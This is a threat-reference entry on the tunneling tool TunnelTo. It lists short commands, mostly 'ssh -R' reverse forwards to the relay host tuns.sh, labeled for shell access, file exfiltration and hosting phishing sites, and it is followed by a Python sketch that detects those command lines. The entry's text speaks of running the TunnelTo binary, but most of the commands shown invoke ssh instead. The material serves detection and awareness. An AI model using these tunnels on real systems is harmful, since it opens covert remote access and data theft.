TunnelTo

TunnelTo is a free/subscription-based tool that enables local services/applications to be exposed over the internet. Insiders as well as threat actors can use this tool to perform a variety of malicious tasks. The tool requires an authentication token; a free token can be obtained from the website.

Paths:

Resources:

Acknowledgements:

Detections:

Install

  1. TunnelTo can be installed directly via cargo, brew, etc. Downloadable binaries are also provided that can be executed on the fly.

    tunnelto set-auth --key <AUTH KEY>
    Use case
    Installing/Downloading the tunnelto binaries to be executed on the local machine.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Shell Access

  1. Executing the binary to generate a local tunnel by binding it to a local service running on a TCP port.

    ssh -R 2222:localhost:22 tuns.sh
    Use case
    Exposing SSH, RDP, etc. over tunnels for shell access.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Download

  1. Executing the binary to generate a local tunnel by binding it to a local web server running on port 80.

    ssh -R 80:localhost:8080 tuns.sh
    Use case
    Exposing the local system over the tunnels for the files to be exfiltrated out of the organization.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Exfiltration

  1. Executing the binary to generate a local tunnel by binding it to the local file system exposed over port 80.

    ssh -R 80:localhost:8080 tuns.sh
    Use case
    Exposing the local web server/file system over the tunnels for the files to be exfiltrated out of the organization.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux

Phishing

  1. Executing the binary to generate a local tunnel by binding it to the local web server hosting phishing sites.

    ssh -R 80:localhost:8080 tuns.sh
    Use case
    Exposing the local web server hosting phishing sites to target users.
    Privileges required
    User
    Operating systems
    Windows, Mac, Linux
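
A detection sketch for the commands listed above, as an added example that is not part of the original page or of the TunnelTo project: it flags process command lines that match the page's `tunnelto` and `ssh -R ... tuns.sh` invocations. The sample log lines, the function names and the port mapping (22 and 3389 treated as shell access) are assumptions.

```python
import re
import shlex

TUNNEL_HOSTS = {"tuns.sh"}   # relay host used in the page's ssh commands
SHELL_PORTS = {22, 3389}     # assumption: default SSH and RDP ports
# ssh remote forward syntax: -R [bind_address:]port:host:hostport
FORWARD_RE = re.compile(r"^(?:[^:]*:)?(\d+):([^:]+):(\d+)$")
# Constructed sample of process-creation command lines (not real telemetry).
SAMPLE = [
    "tunnelto set-auth --key PLACEHOLDER_KEY",
    "ssh -R 2222:localhost:22 tuns.sh",
    "ssh -R 80:localhost:8080 tuns.sh",
    r"C:\Tools\tunnelto.exe set-auth --key PLACEHOLDER_KEY",
    "ssh -R 8080:localhost:80 build.example.internal",
    "ssh admin@jumphost.example.internal",
]

def classify(cmdline):
    """Return a finding dict for one process command line, or None."""
    try:
        argv = shlex.split(cmdline.replace("\\", "/"))  # keep Windows paths intact
    except ValueError:
        argv = []
    if not argv:
        return None
    exe = re.sub(r"\.exe$", "", argv[0].rsplit("/", 1)[-1].lower())
    if exe == "tunnelto":
        activity = "auth-token setup" if "set-auth" in argv[1:] else "client execution"
        return {"tool": "tunnelto", "activity": activity}
    if exe != "ssh" or not any(a.rsplit("@", 1)[-1].lower() in TUNNEL_HOSTS for a in argv[1:]):
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg == "-R" and i + 1 < len(argv):
            spec = argv[i + 1]
        elif arg.startswith("-R") and len(arg) > 2:
            spec = arg[2:]
        else:
            continue
        m = FORWARD_RE.match(spec)
        if m:
            local_port = int(m.group(3))
            # Download, exfiltration and phishing share one command line on the page.
            activity = "shell access" if local_port in SHELL_PORTS else "web exposure"
            return {"tool": "ssh", "activity": activity,
                    "remote_port": int(m.group(1)), "local_port": local_port}
    return None

def scan(lines):  # (line, finding) pairs for every line that matched
    return [(line, f) for line in lines if (f := classify(line)) is not None]
```

Because the Download, Exfiltration and Phishing entries use the same command line, telling them apart requires correlating the alert with what is listening on the forwarded local port.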